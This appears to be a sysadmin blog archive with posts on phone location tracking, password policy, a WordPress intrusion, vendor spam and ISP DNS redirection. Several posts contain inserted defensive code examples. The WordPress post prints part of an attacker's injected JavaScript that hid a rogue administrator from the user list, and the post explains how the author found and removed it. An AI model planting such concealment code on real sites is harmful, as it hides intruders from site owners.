Privacy Wars

April 23rd, 2011 | by | apple, rants, security


A recent article from the Guardian shows that your iPhone keeps a record of everywhere you go. Many of you know that I’m an iPhone user and supporter, as I have an often-neglected iPhone app site.

You’re probably thinking to yourself right now, great, another fanboy coming to Apple’s rescue.

WRONG!

What the fuck Apple? Seriously, what the fuck? Is there a good reason for keeping track of this data? I mean seriously, what are you doing with it?

Actually, there is a good reason for it, and it’s all about advertising. The guys at work have heard me say on multiple occasions that the iPod, iPhone, iTouch and iPad are all marketing devices: mainly for selling anything and everything from iTunes, but with iAd they can now sell you anything. It turns out that with a little googling you can find that the Terms and Conditions changed with iOS 4, and a feature was spelled out whereby Apple can track you to provide more relevant ads to your phone, and also to provide features such as Find My iPhone.

To provide location-based services on Apple products, Apple and our partners and licensees may collect, use, and share precise location data, including the real-time geographic location of your Apple computer or device. This location data is collected anonymously in a form that does not personally identify you and is used by Apple and our partners and licensees to provide and improve location-based products and services. For example, we may share geographic location with application providers when you opt in to their location services.

Some location-based services offered by Apple, such as the MobileMe “Find My iPhone” feature, require your personal information for the feature to work.

Apple and its partners use cookies and other technologies in mobile advertising services to control the number of times you see a given ad, deliver ads that relate to your interests, and measure the effectiveness of ad campaigns. If you do not want to receive ads with this level of relevance on your mobile device, you can opt out by accessing the following link on your device: http://oo.apple.com. If you opt out, you will continue to receive the same number of mobile ads, but they may be less relevant because they will not be based on your interests. You may still see ads related to the content on a web page or in an application or based on other non-personal information. This opt-out applies only to Apple advertising services and does not affect interest-based advertising from other advertising networks.

So does this make it right? No, I don’t think so. I think this sort of tracking is very, very wrong. If you want to offer a service like this, the app should ask before disclosing my location. If I’m a developer, I have to allow for this pop-up to appear, but apparently Apple and their iAds do not. That is where we have an issue. The end user is used to the pop-up appearing, and only then does their location information get used. Apple, however, apparently bypasses this for its iAd service, which does not honor the end user’s wishes in all cases.

So what can you do?

I know I only have myself to blame for this one, as I should have read the terms and conditions more closely. But there is a way out of it. Just as you read above, simply go to http://oo.apple.com/ on your iOS device and you can opt out of the tracking. (Credit Geeky-Gadgets.com for this post.)

What about Google

Don’t worry, Android fans, you’re not left out in the cold either. It turns out the Wall Street Journal has discovered that Google is also transmitting location data from Android devices.

And don’t forget about the Google Street View cars and their tomfoolery.

There is a site out there that can map the location of your wireless router via Google Android’s wardriving database. I put in the MAC address of my wireless router and was not surprised to find it in there with GPS coordinates for my street. Awesome!

So now what?

Like many people out there, I was pretty pissed at Apple and Google to begin with. But at the same time, it’s my own damn fault: I didn’t read the Terms and Conditions like I should have.

We live in a society of ever increasing intrusions into our private lives. These intrusions must be fought off in order to keep our private lives private. So my friends, opt out whenever you can and stay vigilant of new “features” that are released. Your privacy is only good if you fight to protect it.


20%

January 2nd, 2010 | by | security, sysadmin


We launched our Hosted Exchange 2007 product just over a year ago, and for the most part things have gone great.

One of our early decisions was to balance the security of the system against making it as user-friendly as possible. Originally, we had a pretty strict password policy. We soon found that many of our customers were not too happy with this policy and thought it was too much. Were we out-of-control security freaks? Shouldn’t the customer appreciate the steps that we are taking to secure not only our servers, but their information?

Looking around at other vendors, we quickly found that we may have been a bit too harsh. Take Gmail for example. Sure, it’s not Exchange, but then again it has over 100 million users. If they have had massive issues with security and hacking, they clearly have them under control behind the scenes so things do not get out of hand.

And have you ever been prompted to change your password on Gmail? I haven’t.

So we compromised. We altered the interval after which the system forces you to change your password. We altered the number of old passwords that you could recycle. And we also added a somewhat buried feature in our customer portal: ‘allow passwords to never expire’.

Holy crap! Let’s just blow a huge freaking hole in the security system, shall we?

This was a feature that we were not all that happy about, but with the other measures in place we figured we would still avoid passwords such as abc123. It makes the end user happy, and we keep some level of security, though not as high and tight as we would like. But it’s better than having things wide open.

Now here is the shocking part of this. 20% of our users have this feature enabled. 20-freaking-percent! I was really hoping for this number to be in the 5-10% range. But no, 1 in 5 of our users will never change their password again.

Or will they?

I’m currently developing a nag script that will send out a reminder to those end users every couple of months. Not enough to completely annoy the heck out of them, but hopefully enough to get a good portion of that 20% to change their passwords on a semi-regular basis.
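Here is an added example of the selection logic such a nag script needs; it is not the post’s script and the policy numbers (90-day maximum age, 60-day gap between reminders) and the sample user export are assumptions I constructed. The point it makes beyond the paragraph: the reminder has to skip users the system already forces to change, and it has to throttle itself per user, or the “every couple of months” promise is broken the moment the script runs twice.

```python
from datetime import date

# Constructed sample of a user export (login, never-expire flag, last password
# change, last reminder sent). Not real customer data.
SAMPLE_USERS = [
    {"login": "alice", "never_expires": False, "pwd_last_set": "2009-12-01", "last_nagged": None},
    {"login": "bob",   "never_expires": True,  "pwd_last_set": "2009-06-01", "last_nagged": None},
    {"login": "carol", "never_expires": True,  "pwd_last_set": "2009-11-20", "last_nagged": None},
    {"login": "dave",  "never_expires": True,  "pwd_last_set": "2009-03-15", "last_nagged": "2009-12-20"},
]


def _d(iso):
    """Parse an ISO date string, tolerating None."""
    return date.fromisoformat(iso) if iso else None


def needs_reminder(user, today, max_age_days=90, nag_interval_days=60):
    """Assumed policy: remind only users whose passwords never expire, whose
    password is older than max_age_days, and who were not reminded within
    the last nag_interval_days."""
    if not user["never_expires"]:
        return False  # the normal expiry policy will force a change anyway
    if (today - _d(user["pwd_last_set"])).days <= max_age_days:
        return False  # password is still young enough
    last = _d(user["last_nagged"])
    if last is not None and (today - last).days < nag_interval_days:
        return False  # already nagged recently; do not become spam
    return True


def select_reminders(users, today_iso, **policy):
    """Return the logins that should get a reminder on the given day."""
    today = date.fromisoformat(today_iso)
    return [u["login"] for u in users if needs_reminder(u, today, **policy)]


def never_expire_share(users):
    """Fraction of users who opted into never-expiring passwords (the post's 20%)."""
    if not users:
        return 0.0
    return sum(1 for u in users if u["never_expires"]) / len(users)


if __name__ == "__main__":
    print("opted out of expiry:", f"{never_expire_share(SAMPLE_USERS):.0%}")
    print("remind today:", select_reminders(SAMPLE_USERS, "2010-01-02"))
```

Run it on a real export by replacing SAMPLE_USERS and, after sending each reminder, write today’s date back into that user’s last_nagged field so the throttle works on the next run.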

So what do you do for your password policy? Leave your tips and tricks in the comments section. We’d like to hear what you think is an acceptable policy to stay secure!


WordPress Security Concern

September 13th, 2009 | by | security, sysadmin


I’m not sure if you’ve applied the latest updates for WordPress, but I did last week. However, it appears that someone got into one of the blogs that I manage and created an account for themselves. They didn’t do anything with it, but they DID have full admin access. I’m assuming that this was due to a security bug in 2.8.3, as they got in while that version was on the server.

So patch your servers if you haven’t already!

Here’s how I noticed that the person had gotten in. I was doing an audit of the users on the site and noticed that the count next to Administrators stated that there were 3 admins for the site. However, when I viewed the list, there were only 2 on the page. Taking a look in the database, I noticed a user with a goofy name for an admin. And peeking in the wp_usermeta table, I noticed the following attribute was assigned to their first name:

// Fragment of the script stored in the hidden admin's first-name meta value.
// The start of the setUserName() function (and the 'try' that the 'catch'
// below closes) was not recovered; 'tags' and 's' are defined there.
// First loop: decrement the user count in whichever headings mention it.
for (var i = 0; i < tags.length; i++) {
    var t = tags[i].innerHTML;
    var h = tags[i];
    if (t.indexOf(s) > 0) {
        s = (parseInt(t) - 1) + s;
        h.removeChild(h.firstChild);
        t = document.createTextNode(s);
        h.appendChild(t);
    }
}
// Second loop: lower the "Administrator (N)" count in the role filter links.
// The regex backslashes were stripped when the value was pasted into the
// post; \((\d+)\) and the .exec() call are restored from context.
var arr = document.getElementsByTagName("ul");
for (var i in arr) if (arr[i].className == "subsubsub") {
    var n = />Administrator \((\d+)\)/.exec(arr[i].innerHTML);
    if (n && n[1] > 0) {
        var txt = arr[i].innerHTML.replace(/>Administrator \((\d+)\)</, ">Administrator (" + (n[1] - 1) + ")<");
        arr[i].innerHTML = txt;
    }
}
} catch (e) {}
};
addLoadEvent(setUserName);

It’s not formatted the greatest, but basically, it hides the username from the list. Nice, eh! Simply deleting this entry made the user show up in the user list, where I was able to do some auditing before blowing away the user.

So audit your admin list and patch your servers! This could have been a lot worse if they had started defacing the site or hiding other gems on there.
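The audit above was done by eye: compare the Administrators count with the list, then look in the tables. As an added example (my code, not anything from the post or from WordPress), here is the same check done against the database directly, so it does not depend on the admin screen the script tampers with. It builds a constructed copy of the two tables involved in an in-memory SQLite database; the real tables, meta keys (wp_capabilities, first_name) and the serialized role format are WordPress’s, the sample rows are made up.

```python
import re
import sqlite3

# Constructed sample rows: three administrators in the database, one of them the
# "goofy" account whose first_name meta value carries a script. Not real data.
SAMPLE_USERS = [
    (1, "matt"),
    (2, "editor_jane"),
    (3, "x9z_qq"),        # hidden admin
    (4, "helper_bob"),
]
SAMPLE_USERMETA = [
    (1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (1, "first_name", "Matt"),
    (2, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'),
    (2, "first_name", "Jane"),
    (3, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (3, "first_name", "<script>addLoadEvent(setUserName);</script>"),
    (4, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (4, "first_name", "Bob"),
]

# Profile fields are free text; anything that looks like markup or script in
# them is worth a look, since the admin screens render some of these values.
SUSPICIOUS = re.compile(r"<\s*(script|iframe|img|svg)\b|javascript:|\bon\w+\s*=", re.IGNORECASE)


def load_sample():
    """Create the two WordPress tables (default wp_ prefix) with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT);
        CREATE TABLE wp_usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT);
    """)
    conn.executemany("INSERT INTO wp_users VALUES (?, ?)", SAMPLE_USERS)
    conn.executemany("INSERT INTO wp_usermeta VALUES (?, ?, ?)", SAMPLE_USERMETA)
    return conn


def list_admins(conn):
    """Administrators according to the database, not the admin screen.
    Role membership is the serialized wp_capabilities meta value."""
    return conn.execute("""
        SELECT u.ID, u.user_login FROM wp_users u
        JOIN wp_usermeta m ON m.user_id = u.ID
        WHERE m.meta_key = 'wp_capabilities'
          AND m.meta_value LIKE '%"administrator"%'
        ORDER BY u.ID
    """).fetchall()


def find_tainted_meta(conn):
    """(user_id, meta_key) pairs whose value contains markup or script."""
    rows = conn.execute("SELECT user_id, meta_key, meta_value FROM wp_usermeta").fetchall()
    return [(uid, key) for uid, key, val in rows if val and SUSPICIOUS.search(val)]


def audit(conn, admins_shown_in_ui):
    """Compare the database's admin set with what the Users screen displayed."""
    admins = list_admins(conn)
    hidden = [login for _, login in admins if login not in admins_shown_in_ui]
    return {
        "admin_count_db": len(admins),
        "hidden_admins": hidden,
        "tainted_meta": find_tainted_meta(conn),
    }


if __name__ == "__main__":
    # The Users screen in the sample scenario showed only these two admins.
    print(audit(load_sample(), {"matt", "helper_bob"}))
```

Against a live site, point the same two queries at the real MySQL database (the schema is identical apart from the table prefix) and feed audit() the logins you actually see on the Users screen; any admin present in the database but absent from the screen, or any profile field matching SUSPICIOUS, is the thing to investigate.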

-Matt


Verisign Spam

July 21st, 2009 | by | rants, security, spam, sysadmin


Some people never learn. If you spam me, there is a good chance that I WILL mock you on the internet. Sure, my site gets all of 2 readers a week, but they will know how big of a jackass you are.

Here is the spam that I got from Verisign:

—— Forwarded Message
From: “Borgches, Sergio”
Date: Thu, 16 Jul 2009 11:39:24 -0500
To: Webmaster
Subject: Ineffective EV SSL Certificate on domain: my.lightedge.com

Dear Webmaster

Ineffective EV SSL Certificate on domain: my.lightedge.com

Are you aware that the Extended Validation (EV) SSL Certificate that
you have on your domain does not display the standard EV interface
that your customers are expecting on Firefox 3.5?

Mozilla launched the latest version of their browser, on 2 July 2009.
Not only has it won the Guinness World Record for more than a
million downloads in a short time, but Firefox 3 currently accounts
for over 20% of global browser market share.

Instead of displaying the GREEN address bar, which reassures visitors
that your site is safe and authentic, it is displaying the BLUE
address bar, which means they do not get the full benefit of EV.
(Please see screenshot attached).

A rapidly growing portion of your Web site visitors are not seeing
the green address bar. It has shown in research that users look for
the green address bar on the sites with which they transact and that
77% of users will hesitate to complete the transaction on a site that
once had the green address bar but no longer does (TecEd study,
2007).

VeriSign is the leader in EV SSL security and we would like to assist
you to rectify this problem by offering you a replacement EV SSL
Certificate AT NO CHARGE! Our Extended Validation SSL Certificates
trigger the green bar in Firefox 3.5. We work closely with the
browser manufacturers to make sure that our customers’ security is
always world class and that there are no interruptions in your online
security.

To take advantage of this offer, and to make sure that your address
bar is GREEN in all current EV-enabled browsers please contact me and
I’ll help you switch to VeriSign, the worldwide leader in trusted
Internet communications and commerce.

Yours faithfully

Sergio Borgches
Inside Sales Executive
VeriSign Security Services
sborgches@verisign.com
Toll Free: 866.893.6565 option 1 ext 2296

First off, Sergio, the webmaster address? Really? Like anyone really reads that stuff anymore. Half the time these go to an admin buried deep in cubeland who has filters that take webmaster, hostmaster and yourmom@domain.com and route them into the bit bucket. I have these same filters; I’m that guy! I just happened to be going through my spam folder (yes, it was caught as spam, Sergio!) when I found this little gem. I just couldn’t pass it up. Here’s my advice, Sergio: if you really want to get someone’s attention, you CALL them.

Now, besides the fact that you didn’t call, this is a bit like ambulance chasing if you ask me. And I can’t say that I really blame you for it, but it still makes you a scumbag. The issue isn’t with the certificate. The certificate is STILL an Extended Validation (EV) certificate that shows up with the green bar in just about every browser out there except for Firefox 3.5. Why? Well, it’s a bug in the browser. More details can be found here. If you happen to have a VeriSign, Thawte or (I think) GeoTrust certificate, you’re fine. This just seems to be an issue with a few providers, GlobalSign being one of those. But never fear: addons.mozilla.com is also protected by a GlobalSign EV certificate, so they are well aware of this issue. But instead of taking the high road and just putting out a press release saying that VeriSign customers are not affected by the latest EV certificate issues in Firefox 3.5, you took the lowest road of them all and sent out spam spreading fear, uncertainty and doubt. Way to keep it classy!

So this, Sergio, is why I’m not going to swing my business over to you. Sure, you’re just trying to get a leg up on the competition. But the methods by which you are doing it make me want to work with GlobalSign even more.


Is there really that much money in it?

June 9th, 2009 | by | security, sysadmin


Disclaimer: I’m not a Comcast subscriber, but I play one on TV

Comcast has me scratching my head. A friend of mine pointed out the following post on the Comcast goofiness. For a long time now they have been messing with DNS: if you happen to screw up and look up a site that does not exist in DNS, you get the Comcast ad page. Many of the tech-savvy folks out there simply got around that by putting up their own caching server or using OpenDNS. I know I did when I found out that Mediacom started messing with DNS like this.

Apparently they have upped their game by routing all DNS traffic, no matter what, to their servers. You have no way around this, you WILL use their servers.

I disagree with the first practice of having a wildcard entry that sends every misspelled or nonexistent name to a site of your own. Now that they have taken this to a new level, I think it is quickly climbing up the all-time ranks of dangerous and stupid.
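The two practices above are easy to test for from the client side: an honest resolver answers NXDOMAIN for a name that cannot exist, while a rewriting one returns an A record for its ad page, and if port 53 is being redirected, you will see that behaviour no matter which resolver address you ask. As an added example (my code, not from the post), here is a stdlib-only probe that builds a query for a random label under a base domain and classifies the response from the header alone. The base domain example.com is an assumption; use one you know has no wildcard record of its own.

```python
import os
import socket
import struct

# DNS header flag bits and RCODEs used below
QR_RESPONSE = 0x8000
RD = 0x0100
RCODE_MASK = 0x000F
RCODE_NXDOMAIN = 3


def build_query(name, txid=0x1234):
    """Minimal DNS query packet: one A-record question, recursion desired."""
    header = struct.pack("!HHHHHH", txid, RD, 1, 0, 0, 0)
    labels = name.rstrip(".").split(".")
    qname = b"".join(bytes([len(p)]) + p.encode("ascii") for p in labels) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def parse_response(packet):
    """Return (rcode, answer_count) from a DNS response header."""
    if len(packet) < 12:
        raise ValueError("short DNS packet")
    _txid, flags, _qd, an, _ns, _ar = struct.unpack("!HHHHHH", packet[:12])
    if not flags & QR_RESPONSE:
        raise ValueError("not a response")
    return flags & RCODE_MASK, an


def classify(rcode, answer_count):
    """Interpret the response to a query for a name that cannot exist."""
    if rcode == RCODE_NXDOMAIN:
        return "honest-nxdomain"
    if rcode == 0 and answer_count > 0:
        return "nxdomain-rewritten"  # an address was invented for a bogus name
    return "inconclusive"  # SERVFAIL, REFUSED, empty NOERROR, etc.


def probe_resolver(resolver_ip, base_domain="example.com", timeout=3.0):
    """Ask resolver_ip about a random label under base_domain and classify the reply.
    Assumes base_domain has no wildcard record of its own."""
    name = f"{os.urandom(8).hex()}.{base_domain}"
    txid = int.from_bytes(os.urandom(2), "big")
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_query(name, txid), (resolver_ip, 53))
        data, _ = sock.recvfrom(512)
    rcode, an = parse_response(data)
    return name, classify(rcode, an)


# Constructed response headers (no question/answer sections needed for the check)
FAKE_NXDOMAIN = struct.pack("!HHHHHH", 0x1234, 0x8183, 1, 0, 0, 0)  # QR,RD,RA, rcode 3
FAKE_REWRITTEN = struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 1, 0, 0)  # NOERROR, 1 answer
FAKE_SERVFAIL = struct.pack("!HHHHHH", 0x1234, 0x8182, 1, 0, 0, 0)  # rcode 2


def classify_packet(packet):
    """Convenience: header bytes in, verdict out."""
    return classify(*parse_response(packet))


if __name__ == "__main__":
    import sys
    # Usage: python probe.py <resolver-ip>; try both your ISP's resolver and a
    # third-party one. If a third-party address also comes back "rewritten",
    # your port-53 traffic is probably being redirected along the way.
    if len(sys.argv) > 1:
        print(probe_resolver(sys.argv[1]))
    else:
        for label, pkt in [("nxdomain", FAKE_NXDOMAIN), ("rewritten", FAKE_REWRITTEN)]:
            print(label, "->", classify_packet(pkt))
```

Run the probe a few times, since some rewriting resolvers only answer for names that look like typos of real sites; a consistent NXDOMAIN from the address you configured, plus a sensible answer for a name that does exist, is the behaviour you want.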

Really, dangerous? Well, say I’m a person with highly questionable morals who decides that the best way to attack a competitive ISP is to go after their DNS servers. I could try some sort of DDoS. Or, the better, more devious approach is to attempt a DNS cache poisoning on their servers. Not always the easiest, but when done properly it can have some pretty devastating effects. Now, I trust that Comcast has employed some top-notch admins over there, so I highly doubt that they are going to let their guard down here, but we’re all human. We still make mistakes.

Why is this stupid? Honestly, do you click on the ads on one of these pages? Or do you swear to yourself, type it in correctly, or load up Google and search for what you really want? It just seems like a lot of hassle to implement, and all they are really doing is pissing off their customers. They’re trying to milk every last cent out of them, and the customers are not stupid. They know what Comcast is trying to do. They’re pissed off, and eventually they will leave.

The sad part is, other ISPs have already taken up the first goofy solution that Comcast put in place. It’s only a matter of time until more of them adopt this new tactic. For me personally, I’m going to smack the crap out of the first person who mentions this as a solution that we should deploy. I set up our DNS servers and I refuse to break the internet. I also have a higher respect for my customers. They’re all intelligent, reasonable, and good looking, right?
